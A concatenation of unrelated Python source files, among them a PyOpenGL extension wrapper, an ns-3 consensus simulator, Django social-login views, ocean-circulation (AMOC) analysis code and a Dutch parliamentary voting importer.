help="Uses xinupt to disable/enable touchscreen to raise context menu during press",
action="store_true")
args = parser.parse_args()
initiate_gesture_find(args.use_pymouse, args.long_press_workaround)
|
'''OpenGL extension AMD.compressed_3DC_texture
This module customises the behaviour of the
OpenGL.raw.GLES2.AMD.compressed_3DC_texture to provide a more
Python-friendly API
Overview (from the spec)
Two compression formats are introduced:
- A compression format for two component textures. When used to store
normal vectors, the two components are commonly used with a fragment
shader that derives the third component.
- A compression format for single component textures. The single component
may be used as a luminance or an alpha value.
There are a large number of games that use luminance only and/or alpha only
textures. For example, monochrome light maps used in a few popular games
are 8-bit luminance textures. This extension describes a compression format
that provides a 2:1 compression ratio for 8-bit single channel textures.
Normal maps are special textures that are used to add detail to 3D surfaces.
They are an extension of earlier "bump map" textures, which contained per-
pixel height values and were used to create the appearance of bumpiness on
otherwise smooth surfaces. Normal maps contain more detailed surface
information, allowing them to represent much more complex shapes.
Normal mapping is one of the key features that makes the current generation
of games look so much better than earlier titles. A limitation to the
effectiveness of this technique is the size of the textures required. In an
ideal case where every surface has both a color texture map and a normal
texture map, the texture memory and bandwidth requirements would double
compared to using color maps alone.
In fact, the problem is much worse because existing block based compression
methods such as DXTc, ETC, and S3TC are ineffective at compressing normal
maps. They tend to have trouble capturing the small edges and subtle
curvature that normal maps are designed to capture, and they also introduce
unsightly block artifacts.
Because normal maps are used to capture light reflections and realistic
surface highlights, these problems are amplified relative to their impact on
color textures. The results are sufficiently poor that game artists and
developers would rather not use normal map compression at all on most
surfaces, and instead limit themselves to lower resolution maps on selected
parts of the rendered scene.
3DC provides an ideal solution to the normal map compression problem. It
provides up to 4:1 compression of normal maps, with image quality that is
virtually indistinguishable from the uncompressed version. The technique is
hardware accelerated, so the performance impact is minimal. Thus,
developers are freed to use higher resolution, more detailed normal maps,
and/or use them on all of the objects in a scene rather than just a select
few.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/AMD/compressed_3DC_texture.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.AMD.compressed_3DC_texture import *
from OpenGL.raw.GLES2.AMD.compressed_3DC_texture import _EXTENSION_NAME
def glInitCompressed3DcTextureAMD():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
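# A hedged usage sketch: with a current GL/GLES context (context creation not
# shown), check for the extension before uploading 3DC-compressed data; the
# GL_3DC_X_AMD / GL_3DC_XY_AMD tokens come from the raw module star-imported above.
def _has_3dc_support():
    '''Return True when the AMD_compressed_3DC_texture extension is usable.'''
    return bool(glInitCompressed3DcTextureAMD())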
|
MOD = 10**9+7
def valueFromList(head):
value = 0
current_node = head
while current_node:
value = (value * 10) + current_node.data
current_node = current_node.next
return value
def multiplyTwoList(head1, head2):
val1 = valueFromList(head1)
val2 = valueFromList(head2)
return (val1*val2) % MOD
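# Hedged usage sketch: the functions above assume singly linked list nodes with
# .data and .next attributes; the Node class below is a hypothetical stand-in
# used only to show the digit-by-digit evaluation (324 * 5 = 1620).
class Node:
    def __init__(self, data, nxt=None):
        self.data = data
        self.next = nxt
def build(digits):
    head = None
    for d in reversed(digits):
        head = Node(d, head)
    return head
if __name__ == '__main__':
    print(multiplyTwoList(build([3, 2, 4]), build([5])))  # 1620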
|
import pathlib
from aws_cdk import aws_apigatewayv2_alpha as apigatewayv2_alpha
from aws_cdk import (
aws_apigatewayv2_integrations_alpha as apigatewayv2_integrations_alpha,
)
from aws_cdk import aws_lambda as lambda_
from aws_cdk import aws_lambda_python_alpha as lambda_python_alpha
from constructs import Construct
class Api(Construct):
def __init__(self, scope: Construct, id_: str) -> None:
super().__init__(scope, id_)
self.lambda_function = lambda_python_alpha.PythonFunction(
self,
"LambdaFunction",
runtime=lambda_.Runtime.PYTHON_3_7,
entry=str(pathlib.Path(__file__).parent.joinpath("runtime").resolve()),
index="lambda_function.py",
handler="lambda_handler",
)
api_gateway_http_lambda_integration = (
apigatewayv2_integrations_alpha.HttpLambdaIntegration(
"ApiGatewayHttpLambdaIntegration", handler=self.lambda_function
)
)
self.api_gateway_http_api = apigatewayv2_alpha.HttpApi(
self,
"ApiGatewayHttpApi",
default_integration=api_gateway_http_lambda_integration,
)
|
# optimizer
optimizer = dict(type='SGD', lr=30, momentum=0.9, weight_decay=0.0)
# learning policy
lr_config = dict(policy='CosineAnnealing', min_lr=0.)
# runtime settings
runner = dict(type='EpochBasedRunner', max_epochs=100)
|
# -*- coding: utf-8 -*-
"""
Tested
Works
"""
import camera
import crop
import imageWorker as iW
import cv2
import math
def camCalib():
# #LIVE
# #Connect to camera
cam = camera.camera()
cam.cameraOn()
#Create image worker
imgWork = iW.ImgWorker()
print("La bordet kun inneholde sjakkbrettet")
input("Trykk enter når du er klar")
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
print("Sett ut en brikke, tast inn x verdi og y verdi fra flexpedant")
i1=input("x,y: ")
i1 = tuple(float(x) for x in i1.split(","))
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
_, i1_p = imgWork.getFromTo() # _ is the image, which we do not need here
print(i1_p)
print("Sett ut en brikke til, tast inn x verdi og y verdi fra flexpedant")
i2=input("x,y: ")
i2 = tuple(float(x) for x in i2.split(","))
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
_,i2_p = imgWork.getFromTo()
cam.cameraOff()
P1=[i1[0],i1[1]]
p1=[i1_p[0][0],i1_p[0][1]]
P2=[i2[0],i2[1]]
p2=[i2_p[0][0],i2_p[0][1]]
print(P1)
print(P2)
print(p1)
print(p2)
y=math.sqrt((p2[0]-p1[0])**2+(p2[1]-p1[1])**2)
Y=math.sqrt((P2[0]-P1[0])**2+(P2[1]-P1[1])**2)
mm = Y/y
x0=P1[0]-p1[0]*mm
y0=P1[1]-p1[1]*mm
# print(x)
return mm, p1
if __name__ == "__main__":
print(camCalib())
# P1[xxx,yyy]
# p1[rrr,uuu]
# mm = 0.3
|
import ns.core
import numpy as np
from src.simulator.internet.communicator import Communicator
from collections import OrderedDict
CHECK_TIME_SLOT = 0.0001
DEFAULT_TIME_SLOT = 0.1
DEFAULT_OFFLINE_NUMBER = 0
MAX_BLOCK_DURATION = 9999999999999
BASE_PORT = 5000
class DecentralizedConsensus:
def __init__(self, model_size, ps_node_container, matrix, data_rate=1e9, packet_size=536,
protocol='tcp', port=9, verbose=False, offline_params={}, max_block_duration=None):
assert protocol in ['tcp', 'udp']
assert ps_node_container.GetN() == len(matrix)
self.ps_node_container = ps_node_container
self.model_size = model_size
self.matrix = matrix # np.ndarray
self.data_rate = data_rate
self.packet_size = packet_size
self.protocol = protocol
self.port = port
self.node_num = self.ps_node_container.GetN()
self.verbose = verbose
self.offline_params = offline_params
# self.sender_receiver_matrix = None
self._time_consuming = 0
self.communicator_list = None
self.global_comm_matrix_list = None
self.max_block_duration = max_block_duration if max_block_duration is not None else MAX_BLOCK_DURATION
def __del__(self):
self.reset()
def reset(self):
self._time_consuming = 0
for communicator in self.communicator_list:
communicator.reset()
def get_time_consuming(self):
return self._time_consuming
def init_app(self, start_time=0, stop_time=None, phases=1):
# source node src (ps_node_container.Get(src)) will send data to
# sink node dst (ps_node_container.Get(dst)), which listens on port src+BASE_PORT
self.global_comm_matrix_list = [np.zeros((self.node_num, self.node_num), dtype=int) for _ in range(phases)]
self.communicator_list = [Communicator(self.ps_node_container.Get(i), i, self.offline_params,
self.protocol, self.verbose, self.global_comm_matrix_list)
for i in range(self.node_num)]
self.sender_receiver_matrix = [[None for _ in range(self.node_num)] for _ in range(self.node_num)]
for src in range(self.node_num):
for dst in range(self.node_num):
if src != dst and self.matrix[src, dst] > 0:
if self.verbose:
print("Mixing model: PS %d -> PS %d" % (src, dst))
app_receiver = self.communicator_list[dst].add_app_receiver(src, self.model_size, phases, src+BASE_PORT,
start_time, stop_time)
dst_node = self.ps_node_container.Get(dst)
app_sender = self.communicator_list[src].add_app_sender(dst, dst_node, self.model_size, phases, src+BASE_PORT,
self.packet_size, self.data_rate,
start_time, stop_time)
self.communicator_list[dst].associate_upstream_app_sender(src, app_sender)
# self.sender_receiver_matrix[src][dst] = (app_sender, app_receiver)
def is_finished(self):
communicator_states = [communicator.is_finished() for communicator in self.communicator_list]
return np.all(communicator_states)
def offline_thread(self):
# recover the nodes offline in the last time slot
online_comms = [self.communicator_list[i] for i in range(len(self.communicator_list)) if
self.communicator_list[i].is_offline()]
online_comm_ids = [comm.get_id() for comm in online_comms]
# decide the nodes offline in this time slot
offline_comms = np.random.choice(self.communicator_list,
int(self.offline_params.get("number", DEFAULT_OFFLINE_NUMBER)), replace=False)
offline_comm_ids = [comm.get_id() for comm in offline_comms]
print(offline_comm_ids)
# take out the nodes which will stay offline in this slot
online_comms = [self.communicator_list[i] for i in online_comm_ids if i not in offline_comm_ids]
online_comm_ids = [comm.get_id() for comm in online_comms]
if self.verbose:
print("\n---------------------------------------------------------------------------")
print("[offline] At time %.6f %d nodes are:" % (ns.core.Simulator.Now().GetSeconds(), len(offline_comms)),
offline_comm_ids)
print("[online] At time %.6f %d nodes are:" % (ns.core.Simulator.Now().GetSeconds(), len(online_comms)),
online_comm_ids)
for i in range(len(offline_comms)):
offline_comms[i].offline_operation()
for i in range(len(online_comms)):
online_comms[i].online_operation()
online_comms[i].send_message()
online_comms[i].inform_upstream_send_message()
if not self.is_finished():
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(self.offline_params.get("time_slot", DEFAULT_TIME_SLOT))),
self.offline_thread)
def is_blocked_by(self, comm_x, comm_y):
if self.matrix[comm_y.get_id(), comm_x.get_id()] <= 0:
return False
lagging_list = comm_x.get_lagging_communicator_ids()
if len(lagging_list) == 1 and lagging_list[0] == comm_y.get_id():
return True
else:
return False
def unblock_thread(self):
for src, communicator_y in enumerate(self.communicator_list):
if communicator_y.is_offline():
dst_list = [dst for dst in self.matrix[communicator_y.get_id(), :].nonzero()[0] if dst != communicator_y.get_id()]
for dst in dst_list:
communicator_x = self.communicator_list[dst]
if self.is_blocked_by(communicator_x, communicator_y):
if self.verbose:
print("Node %d was blocked by node %d" % (communicator_x.get_id(), communicator_y.get_id()))
# unblock the online communicator y if exceeding maximum block duration
if ns.core.Simulator.Now().GetSeconds() - communicator_x.get_current_time() > self.max_block_duration:
ignoring_phase = communicator_x.abandon_data_from(communicator_y)
if ignoring_phase is not None:
_ = communicator_y.abandon_data_from(communicator_x, ignoring_phase)
# if self.verbose:
# print("Node %d would not receive data from node %d in %d-th phase"
# % (communicator_x.get_id(), communicator_y.get_id(), ignoring_phase))
if len(dst_list) == 0:
src_list = self.matrix[:, communicator_y.get_id()].nonzero()[0]
for src in src_list:
communicator_x = self.communicator_list[src]
if ns.core.Simulator.Now().GetSeconds() - communicator_x.get_current_time() > self.max_block_duration:
ignoring_phase = communicator_y.abandon_data_from(communicator_x)
if not self.is_finished():
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(CHECK_TIME_SLOT)), self.unblock_thread)
def run(self, start_time, stop_time, phases=1):
self.init_app(start_time, stop_time, phases)
# any communicator may be offline in the initial phase
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.offline_thread)
for i in range(len(self.communicator_list)):
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.communicator_list[i].send_message)
# dynamically check whether any nodes are blocked by offline nodes
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.unblock_thread)
start_of_simulation = ns.core.Simulator.Now().GetSeconds() + start_time
ns.core.Simulator.Run()
# TODO: get last received time ?
end_of_simulation = max([communicator.get_current_time() for communicator in self.communicator_list])
if self.is_finished():
self._time_consuming = end_of_simulation - start_of_simulation
else:
self._time_consuming = -1
# print(self.get_comm_matrix_list())
return self._time_consuming
def get_comm_matrix_list(self):
rs = []
c=0
for comm_matrix in self.global_comm_matrix_list:
matrix = comm_matrix.copy()
for i in range(self.node_num):
for j in range(i, self.node_num):
if i == j:
matrix[i, j] = 1
elif matrix[i, j] != matrix[j, i]:
matrix[i, j] = matrix[j, i] = 0
w_matrix = np.zeros_like(matrix, dtype=float)
for i in range(self.node_num):
for j in range(self.node_num):
if i != j and matrix[i, j] > 0:
w_matrix[i, j] = 1 / (max(sum(matrix[:, i]), sum(matrix[:, j])))
w_matrix[i, i] = 1 - w_matrix[i].sum()
W = w_matrix - np.ones_like(w_matrix) / self.node_num
eigen, _ = np.linalg.eig(np.matmul(W, W.T))
p = 1 - np.max(eigen)
tmp = {}
tmp['comm'] = comm_matrix.tolist()
tmp['weight'] = w_matrix.tolist()
tmp['p'] = float(p)
rs.append(tmp)
c+=1
return rs
# def laplace(self, matrix):
# node_num = len(matrix)
# for i in range(node_num):
# for j in range(node_num):
# if i == j:
# matrix[i, j] = 1
#
# w_matrix = np.zeros_like(matrix, dtype=np.float32)
# matrix_sum = matrix.sum(1)
# for i in range(node_num):
# w_matrix[i, i] = matrix_sum[i]
# laplace_matrix = w_matrix - matrix
#
# max_alpha = 1 / laplace_matrix.max()
# w_matrix = np.identity(node_num) - laplace_matrix * max_alpha
# max_p = 1 - np.linalg.norm(w_matrix - 1 / node_num, ord=2) ** 2
# for alpha in np.arange(0, max_alpha, 0.01):
# tmp = np.identity(node_num) - laplace_matrix * alpha
# p = 1 - np.linalg.norm(tmp - 1 / node_num, ord=2) ** 2
# if p > max_p:
# max_p = p
# w_matrix = tmp
# return w_matrix
|
import tensorflow as tf
import os
##############################################################################
# Load model
##############################################################################
ROOT_DIR = os.getcwd()
# Model Directory
MODEL_DIR = "/datasets/models/mrcnn/fullstack_fullnetwork/chips20200326T0339/"
DEFAULT_WEIGHTS = "/datasets/models/mrcnn/fullstack_fullnetwork/chips20200326T0339/mask_rcnn_chips_0030.h5"
if __name__ == "__main__":
model_dir = os.path.join(ROOT_DIR, "Model")
export_path = os.path.join(model_dir, "mask_rcnn_chips_builder_no_sign")
with tf.Session(graph=tf.Graph()) as sess:
tf.saved_model.loader.load(sess, ["chips"], export_path)
graph = tf.get_default_graph()
# print(graph.get_operations())
sess.run()
|
from django.contrib.auth import login
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from rest_framework import permissions, status
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from social.apps.django_app.utils import strategy, load_strategy
from clothstream.rest_auth.serializers import LoginSerializer
from clothstream.social_fb import api as social_fb_api
from django.contrib.auth import logout
@csrf_exempt
@api_view(['POST'])
@permission_classes((permissions.IsAuthenticated,))
def user_logout(request):
logout(request)
return Response()
@csrf_exempt
@api_view(['POST'])
@permission_classes((permissions.AllowAny,))
@strategy()
def register_by_access_token(request, backend):
access_token = request.DATA.get('access_token', None)
if not access_token:
return Response("missing access_token", status=400)
try:
user = request.strategy.backend.do_auth(access_token=access_token)
except Exception as err:
return Response(str(err), status=400)
if user:
social_fb_api.enrich_via_facebook(user)
strategy = load_strategy(request=request, backend=backend)
login(strategy.request, user)
serializer = LoginSerializer(instance=user, context={'request': request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response("Bad Credentials", status=403)
@ensure_csrf_cookie
@api_view(['GET'])
@permission_classes((permissions.AllowAny,))
def get_csrf_cookie(request):
""" we serve index.html as static file, single-page app must get csrf cookie prior to login, this is how
"""
return Response()
|
# -*- coding: utf-8 -*-
from formalchemy.tests import *
def test_renderer_names():
"""
Check that the input name take care of multiple primary keys::
>>> fs = FieldSet(primary1)
>>> print(fs.field.render())
<input id="PrimaryKeys-1_22-field" maxlength="10" name="PrimaryKeys-1_22-field" type="text" value="value1" />
>>> fs = FieldSet(primary2)
>>> print(fs.field.render())
<input id="PrimaryKeys-1_33-field" maxlength="10" name="PrimaryKeys-1_33-field" type="text" value="value2" />
Check form rendering with keys::
>>> fs = FieldSet(primary2)
>>> fs.configure(pk=True)
>>> print(fs.render())
<div>
<label class="field_req" for="PrimaryKeys-1_33-id">
Id
</label>
<input id="PrimaryKeys-1_33-id" name="PrimaryKeys-1_33-id" type="text" value="1" />
</div>
<script type="text/javascript">
//<![CDATA[
document.getElementById("PrimaryKeys-1_33-id").focus();
//]]>
</script>
<div>
<label class="field_req" for="PrimaryKeys-1_33-id2">
Id2
</label>
<input id="PrimaryKeys-1_33-id2" maxlength="10" name="PrimaryKeys-1_33-id2" type="text" value="33" />
</div>
<div>
<label class="field_req" for="PrimaryKeys-1_33-field">
Field
</label>
<input id="PrimaryKeys-1_33-field" maxlength="10" name="PrimaryKeys-1_33-field" type="text" value="value2" />
</div>
"""
def test_foreign_keys():
"""
Assume that we can have more than one ForeignKey as primary key::
>>> fs = FieldSet(orderuser2)
>>> fs.configure(pk=True)
>>> print(pretty_html(fs.user.render()))
<select id="OrderUser-1_2-user_id" name="OrderUser-1_2-user_id">
<option selected="selected" value="1">
Bill
</option>
<option value="2">
John
</option>
</select>
>>> print(pretty_html(fs.order.render()))
<select id="OrderUser-1_2-order_id" name="OrderUser-1_2-order_id">
<option value="1">
Quantity: 10
</option>
<option selected="selected" value="2">
Quantity: 5
</option>
<option value="3">
Quantity: 6
</option>
</select>
"""
def test_deserialize():
"""
Assume that we can deserialize a value
"""
fs = FieldSet(primary1, data={'PrimaryKeys-1_22-field':'new_value'})
assert fs.validate() is True
assert fs.field.value == 'new_value'
fs.sync()
session.rollback()
def test_deserialize_new_record():
"""
Assume that we can deserialize a value
"""
fs = FieldSet(PrimaryKeys(), data={'PrimaryKeys-_-id':'8',
'PrimaryKeys-_-id2':'9'})
fs.configure(include=[fs.id, fs.id2])
assert fs.validate() is True
fs.sync()
assert fs.model.id == 8, fs.model.id
assert fs.model.id2 == '9', fs.model.id2
session.rollback()
|
import asyncio
class Pauser:
"""
A helper class to provide pause / resume functionality to other classes.
"""
def __init__(self) -> None:
self._paused = False
self._resumed = asyncio.Event()
@property
def is_paused(self) -> bool:
"""
Return ``True`` if the state of managed operation is paused, otherwise ``False``.
"""
return self._paused
def pause(self) -> None:
"""
Pause the managed operation.
"""
if self._paused:
raise RuntimeError(
"Invalid action. Can not pause an operation that is already paused."
)
self._paused = True
def resume(self) -> None:
"""
Resume the operation.
"""
if not self._paused:
raise RuntimeError("Invalid action. Can not resume operation that isn't paused.")
self._paused = False
self._resumed.set()
async def await_resume(self) -> None:
"""
Await until ``resume()`` is called. Throw if called when the operation is not paused.
"""
if not self._paused:
raise RuntimeError("Can not await resume on operation that isn't paused.")
await self._resumed.wait()
self._resumed.clear()
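# A hedged usage sketch: a worker that honours the Pauser, plus a controller
# that pauses it briefly; plain asyncio, no extra dependencies assumed.
async def _demo():
    pauser = Pauser()
    async def worker():
        for step in range(3):
            if pauser.is_paused:
                await pauser.await_resume()
            print('step', step)
            await asyncio.sleep(0.01)
    async def controller():
        pauser.pause()
        await asyncio.sleep(0.05)
        pauser.resume()
    await asyncio.gather(worker(), controller())
if __name__ == '__main__':
    asyncio.run(_demo())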
|
import attr
from cortexpy.constants import EdgeTraversalOrientation
@attr.s(slots=True)
class OrientedGraphFuncs(object):
graph = attr.ib()
orientation = attr.ib()
color = attr.ib(None)
edges = attr.ib(init=False)
other_edge_node = attr.ib(init=False)
def __attrs_post_init__(self):
assert self.orientation in EdgeTraversalOrientation
if self.orientation == EdgeTraversalOrientation.original:
self.edges = self.graph.out_edges
self.other_edge_node = lambda edge: edge[1]
else:
self.edges = self.graph.in_edges
self.other_edge_node = lambda edge: edge[0]
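# A hedged usage sketch with a toy networkx graph; assumes EdgeTraversalOrientation
# exposes 'original' and 'reverse' members as used in the branch above.
if __name__ == '__main__':
    import networkx as nx
    g = nx.DiGraph([('a', 'b'), ('b', 'c')])
    fwd = OrientedGraphFuncs(g, EdgeTraversalOrientation.original)
    print([fwd.other_edge_node(e) for e in fwd.edges('b')])  # ['c']
    rev = OrientedGraphFuncs(g, EdgeTraversalOrientation.reverse)
    print([rev.other_edge_node(e) for e in rev.edges('b')])  # ['a']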
|
"""Policy package"""
from KID.policy.base_policy import BasePolicy
from KID.policy.kid_policy import KIDPolicy
__all__ = [
'BasePolicy',
'KIDPolicy',
]
|
from vtkplotter import Cube, Text, show, collection
from vtkplotter.settings import fonts
Text("List of available fonts:")
Cube().c('white').rotateX(20).rotateZ(20)
for i, f in enumerate(fonts):
Text(f+': The quick fox jumps over the lazy dog.',
pos=(5,i*40+20), font=f, c=i%3)
show(collection(), axes=False)
|
class Solution:
def solve(self, n, m):
if n%2==0:
return m*(n//2)
if m%2==0:
return n*(m//2)
return ((n-1)//2)*m + (m-1)//2
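# Hedged note: all three branches evaluate to n*m // 2, i.e. the usual count of
# 1x2 dominoes that fit on an n x m board (assuming that is the intended task).
if __name__ == '__main__':
    s = Solution()
    print(s.solve(2, 3))  # 3
    print(s.solve(3, 3))  # 4 == (3*3) // 2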
|
import os
import xgcm
import dask
import numpy as np
import xarray as xr
import pop_tools
import tqdm.notebook as tqdm_notebook
import matplotlib.pyplot as plt
from grid import create_tdepth, find_array_idx
from paths import file_ex_ocn_ctrl, file_ex_ocn_lpd, path_prace
from xr_DataArrays import xr_DZ, xr_DXU, xr_DZ_xgcm
from xhistogram.xarray import histogram
def calculate_AMOC_sigma_z(domain, ds, fn=None):
""" calculate the AMOC in depth and density space """
assert domain in ['ocn', 'ocn_low']
for q in ['PD', 'VVEL', 'DXT', 'DYT', 'DXU', 'DYU', 'REGION_MASK']: assert q in ds
(grid, ds_) = pop_tools.to_xgcm_grid_dataset(ds)
ds_['DZU'] = xr_DZ_xgcm(domain=domain, grid='U')
metrics = {
('X'): ['DXT', 'DXU'], # X distances
('Y'): ['DYT', 'DYU'], # Y distances
('Z'): ['DZU'], # Z distances
}
coords = {
'X': {'center':'nlon_t', 'right':'nlon_u'},
'Y': {'center':'nlat_t', 'right':'nlat_u'},
'Z': {'center':'z_t', 'left':'z_w_top', 'right':'z_w_bot'}
}
grid = xgcm.Grid(ds_, metrics=metrics, coords=coords)
print('merged annual datasets do not convert to U/T-lat/lons')
if 'nlat' in ds_.VVEL.dims:
rn = {'nlat':'nlat_u', 'nlon':'nlon_u'}
ac = {'nlat_u':ds_.nlat_u, 'nlon_u':ds_.nlon_u}
ds_['VVEL'] = ds_.VVEL.rename(rn).assign_coords(ac)
if 'nlat' in ds_.PD.dims:
rn = {'nlat':'nlat_t', 'nlon':'nlon_t'}
ac = {'nlat_t':ds_.nlat_t, 'nlon_t':ds_.nlon_t}
ds_['PD'] = ds_.PD.rename(rn).assign_coords(ac)
print('interpolating density to UU point')
ds_['PD'] = grid.interp(grid.interp(ds_['PD'], 'X'), 'Y')
print('interpolating REGION_MASK to UU point')
fn_MASK = f'{path_prace}/MOC/AMOC_MASK_uu_{domain}.nc'
if os.path.exists(fn_MASK):
AMOC_MASK_uu = xr.open_dataarray(fn_MASK)
else:
MASK_uu = grid.interp(grid.interp(ds_.REGION_MASK, 'Y'), 'X')
AMOC_MASK_uu = xr.DataArray(np.in1d(MASK_uu, [-12,6,7,8,9,11,12]).reshape(MASK_uu.shape),
dims=MASK_uu.dims, coords=MASK_uu.coords)
AMOC_MASK_uu.to_netcdf(fn_MASK)
print('AMOC(y,z); [cm^3/s] -> [Sv]')
AMOC_yz = (grid.integrate(grid.cumint(ds_.VVEL.where(AMOC_MASK_uu),'Z',boundary='fill'), 'X')/1e12)
# AMOC_yz = (ds_.VVEL*ds_.DZU*ds_.DXU).where(AMOC_MASK_uu).sum('nlon_u').cumsum('z_t')/1e12
AMOC_yz = AMOC_yz.rename({'z_w_top':'z_t'}).assign_coords({'z_t':ds.z_t})
AMOC_yz.name = 'AMOC(y,z)'
print('AMOC(sigma_0,z); [cm^3/s] -> [Sv]')
if int(ds_.PD.isel(z_t=0).mean().values)==0:
PD, PDbins = ds_.PD*1000, np.arange(-10,7,.05)
if int(ds_.PD.isel(z_t=0).mean().values)==1:
PD, PDbins = (ds_.PD-1)*1000, np.arange(5,33,.05)
print('histogram')
weights = ds_.VVEL.where(AMOC_MASK_uu)*ds_.DZU*ds_.DXU/1e12
# ds_.PD.isel(z_t=0).plot()
AMOC_sz = histogram(PD, bins=[PDbins], dim=['z_t'],
weights=weights).sum('nlon_u', skipna=True).cumsum('PD_bin').T
AMOC_sz.name = 'AMOC(y,PD)'
# output to file
if fn is not None: xr.merge([AMOC_yz,AMOC_sz]).to_netcdf(fn)
return AMOC_yz, AMOC_sz
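# Hedged usage sketch (not part of the original script): calculate_AMOC_sigma_z expects a
# CESM/POP dataset that already carries PD, VVEL, the grid distances and REGION_MASK.
# Something along these lines, with a placeholder file name:
#
#   ds = xr.open_dataset('yearly_ocn_fields.nc')   # hypothetical input file
#   AMOC_yz, AMOC_sz = calculate_AMOC_sigma_z('ocn', ds, fn=f'{path_prace}/MOC/AMOC_example.nc')
#   AMOC_yz.plot()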
def calculate_MOC(ds, DXU, DZU, MASK):
""" Atlantic Meridional Overturning circulation
input:
ds .. xr Dataset of CESM output
output:
MOC .. 2D xr DataArray
"""
assert 'VVEL' in ds
MOC = (ds.VVEL*DXU*DZU).where(MASK).sum(dim='nlon')/1e2 # [m^3/s]
for k in np.arange(1,42):
MOC[k,:] += MOC[k-1,:]
return MOC
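# Minimal calling sketch for calculate_MOC (assumed, not from the source): DXU/DZU are the
# U-cell zonal width and thickness DataArrays and MASK selects the Atlantic; the loop above
# turns the per-level meridional transport into a cumulative sum over depth.
#
#   MOC = calculate_MOC(ds, DXU=dxu, DZU=dzu, MASK=atlantic_mask)   # dxu/dzu/atlantic_mask are placeholders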
def approx_lats(domain):
""" array of approx. latitudes for ocean """
assert domain in ['ocn', 'ocn_low']
if domain=='ocn':
ds = xr.open_dataset(file_ex_ocn_ctrl, decode_times=False)
lats = ds.TLAT[:,900].copy()
lats[:120] = -78
elif domain=='ocn_low':
ds = xr.open_dataset(file_ex_ocn_lpd, decode_times=False)
lats = ds.TLAT[:,].copy()
return lats
def AMOC_max(AMOC):
""" AMOC maximum at 26 deg N, 1000 m """
lats = approx_lats('ocn')
tdepths = create_tdepth('ocn')
j26 = find_array_idx(lats, 26) # 1451
z1000 = find_array_idx(tdepths, 1000) # 21
return AMOC.isel({'z_t':z1000, 'nlat':j26})
def plot_AMOC(AMOC):
lats = approx_lats('ocn')
tdepths = create_tdepth('ocn')
j26 = find_array_idx(lats, 26)
z1000 = find_array_idx(tdepths, 1000)
    # NOTE: plotting is not implemented yet; j26/z1000 are computed but unused
    return
|
import logging
from django.db import transaction
from wikidata import wikidata
from tkapi.util import queries
from tkapi.zaak import ZaakSoort
from tkapi.besluit import Besluit as TKBesluit
from person.util import parse_name_surname_initials
from person.models import Person
from parliament.models import ParliamentMember
from parliament.models import PoliticalParty
from document.models import Dossier
from document.models import Decision
from document.models import Kamerstuk
from document.models import Vote
from document.models import VoteIndividual
from document.models import VoteParty
from document.models import Voting
logger = logging.getLogger(__name__)
def clean_voting_results(voting_results, dossier_id):
""" Removes votings for other dossiers and duplicate controversial dossier votings """
voting_results_cleaned = []
for voting_result in voting_results:
if str(voting_result.get_dossier_id()) != str(dossier_id):
# this should only happen for controversial voting result lists, example: https://www.tweedekamer.nl/kamerstukken/stemmingsuitslagen/detail?id=2017P05310
logger.info('Voting for different dossier, remove voting')
continue
voting_results_cleaned.append(voting_result)
return voting_results_cleaned
class VotingFactory(object):
def __init__(self, do_create_missing_party=True):
self.vote_factory = VoteFactory(do_create_missing_party=do_create_missing_party)
@transaction.atomic
def create_votings(self, dossier_id):
logger.info('BEGIN')
logger.info('dossier id: ' + str(dossier_id))
dossier_id_main, dossier_id_sub = Dossier.split_dossier_id(dossier_id)
tk_besluiten = queries.get_dossier_besluiten_with_stemmingen(nummer=dossier_id_main, toevoeging=dossier_id_sub)
for tk_besluit in tk_besluiten:
self.create_votings_dossier_besluit(tk_besluit, dossier_id)
logger.info('END')
@transaction.atomic
def create_votings_dossier_besluit(self, tk_besluit: TKBesluit, dossier_id):
dossiers = Dossier.objects.filter(dossier_id=dossier_id)
assert dossiers.count() == 1
dossier = dossiers[0]
result = self.get_result_choice(tk_besluit.tekst)
zaak = tk_besluit.zaak
document_id = ''
if zaak.volgnummer:
document_id = str(dossier_id) + '-' + str(zaak.volgnummer)
is_dossier_voting = zaak.soort in [ZaakSoort.WETGEVING, ZaakSoort.INITIATIEF_WETGEVING, ZaakSoort.BEGROTING]
is_dossier_voting = is_dossier_voting or str(zaak.volgnummer) == '0'
logger.info('{} | dossier voting: {}'.format(document_id, is_dossier_voting))
voting_obj = Voting(
dossier=dossier,
decision=Decision.objects.filter(tk_id=tk_besluit.id).first(),
kamerstuk_raw_id=document_id,
result=result,
date=tk_besluit.agendapunt.activiteit.begin.date(), # TODO BR: replace with besluit date
source_url='',
is_dossier_voting=is_dossier_voting
)
kamerstukken = Kamerstuk.objects.filter(id_main=dossier_id, id_sub=zaak.volgnummer)
if kamerstukken.exists():
kamerstuk = kamerstukken[0]
voting_obj.kamerstuk = kamerstuk
# A voting can be postponed and later voted on
# we do not save the postponed voting if there is a newer voting
if kamerstuk.voting and kamerstuk.voting.date > voting_obj.date:
                logger.info('newer voting for this kamerstuk already exists, skip this voting')
return
elif kamerstuk.voting:
kamerstuk.voting.delete()
elif not is_dossier_voting:
logger.error(
'Kamerstuk ' + document_id + ' not found in database. Kamerstuk is probably not yet published.')
voting_obj.is_individual = ('hoofdelijk' in tk_besluit.tekst.lower())
voting_obj.save()
if voting_obj.is_individual:
self.vote_factory.create_votes_individual(voting_obj, tk_besluit.stemmingen)
else:
self.vote_factory.create_votes_party(voting_obj, tk_besluit.stemmingen)
@staticmethod
def get_result_choice(result_string):
result_string = result_string.lower()
        result_string = result_string.replace('.', '')
